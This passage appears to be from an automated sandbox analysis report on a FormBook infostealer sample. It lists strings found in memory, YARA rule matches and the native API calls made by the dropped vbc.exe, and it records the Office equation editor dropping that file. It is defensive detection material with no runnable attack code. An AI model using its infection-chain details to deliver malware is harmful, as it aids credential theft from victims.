          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2181679428.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000002.2375810590.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]Jump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041817A NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181BA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041826A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D10D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D01D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D1148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D1930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFA20 NtQueryInformationFile,
